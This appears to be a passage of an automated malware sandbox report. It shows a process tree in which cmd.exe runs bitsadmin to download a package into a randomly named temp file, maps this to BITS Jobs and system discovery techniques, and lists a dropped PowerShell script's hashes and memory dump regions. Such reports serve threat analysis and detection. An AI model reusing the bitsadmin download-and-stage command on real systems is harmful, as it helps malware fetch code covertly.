        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:916
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      PID:1560
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1628
- - C:\Windows\SysWOW64\find.exe
    find /v ""
    3⤵
    PID:1232

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

BITS Jobs

T1197

Privilege Escalation

Defense Evasion

BITS Jobs

T1197

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\uc321vVJr.ps1

Filesize
7KB

MD5
f4cb46f8b5ad6b0eb81ed86d7ffd028b

SHA1
8e863e845a20d5b9a39075064787a8bbe75439bd

SHA256
2ef9e2e9c69b030f59c6449fd2004ef0dd3ea0b922554338e16b0e15d226ad99

SHA512
be1ea09b90be46926415b3295cfebc14dad2b2023b80d437fe02ab3393d12157c42d6f2c3ae69bb76e0f8d1bdde785128fee001b95c57e7d6a7a5fd7817a67bc

Download Submit
memory/1000-68-0x0000000073A20000-0x0000000073A4D000-memory.dmp

Filesize
180KB

Download
memory/1000-88-0x00000000738E0000-0x0000000073965000-memory.dmp

Filesize
532KB

Download
memory/1000-66-0x0000000073670000-0x000000007370C000-memory.dmp

Filesize
624KB

Download
memory/1000-67-0x0000000071020000-0x00000000710E3000-memory.dmp

Filesize
780KB

Download
memory/1000-69-0x0000000070AE0000-0x0000000071016000-memory.dmp

Filesize
5.2MB

Download
memory/1000-64-0x0000000073CE0000-0x0000000073D05000-memory.dmp

Filesize
148KB

Download
memory/1000-71-0x0000000073A50000-0x0000000073C85000-memory.dmp

Filesize
2.2MB

Download
memory/1000-72-0x00000000710F0000-0x000000007128E000-memory.dmp

Filesize
1.6MB

Download
memory/1000-73-0x00000000709D0000-0x0000000070AD4000-memory.dmp

Filesize
1.0MB

Download
memory/1000-74-0x00000000708B0000-0x00000000709C4000-memory.dmp

Filesize
1.1MB

Download
memory/1000-75-0x0000000070250000-0x00000000708A1000-memory.dmp

Filesize
6.3MB

Download
memory/1000-76-0x0000000070050000-0x0000000070141000-memory.dmp

Filesize
964KB

Download
memory/1000-63-0x0000000073D10000-0x0000000073D5B000-memory.dmp

Filesize
300KB

Download
memory/1000-57-0x0000000075CF1000-0x0000000075CF3000-memory.dmp

Filesize
8KB

Download
memory/1000-80-0x00000000730A0000-0x000000007364B000-memory.dmp

Filesize
5.7MB

Download
memory/1000-81-0x00000000725A0000-0x0000000073098000-memory.dmp

Filesize
11.0MB

Download
memory/1000-82-0x0000000073D60000-0x0000000073DE1000-memory.dmp

Filesize
516KB

Download
memory/1000-83-0x0000000071E00000-0x000000007259C000-memory.dmp

Filesize
7.6MB

Download
memory/1000-84-0x0000000071290000-0x0000000071B0A000-memory.dmp

Filesize
8.5MB

Download
memory/1000-85-0x0000000073CE0000-0x0000000073D05000-memory.dmp

Filesize
148KB

Download
memory/1000-86-0x0000000071020000-0x00000000710E3000-memory.dmp

Filesize
780KB

Download
memory/1000-87-0x0000000073D10000-0x0000000073D5B000-memory.dmp

Filesize
300KB

Download
memory/1000-65-0x00000000738E0000-0x0000000073965000-memory.dmp

Filesize
532KB

Download
memory/1000-89-0x0000000073670000-0x000000007370C000-memory.dmp

Filesize
624KB

Download
memory/1000-90-0x0000000073A20000-0x0000000073A4D000-memory.dmp

Filesize
180KB

Download
memory/1000-91-0x0000000070AE0000-0x0000000071016000-memory.dmp

Filesize
5.2MB

Download
memory/1000-58-0x00000000730A0000-0x000000007364B000-memory.dmp

Filesize
5.7MB

Download
memory/1000-62-0x0000000071290000-0x0000000071B0A000-memory.dmp

Filesize
8.5MB

Download
memory/1000-61-0x0000000071E00000-0x000000007259C000-memory.dmp

Filesize
7.6MB

Download
memory/1000-59-0x00000000725A0000-0x0000000073098000-memory.dmp

Filesize
11.0MB

Download
memory/1000-60-0x0000000073D60000-0x0000000073DE1000-memory.dmp

Filesize
516KB

Download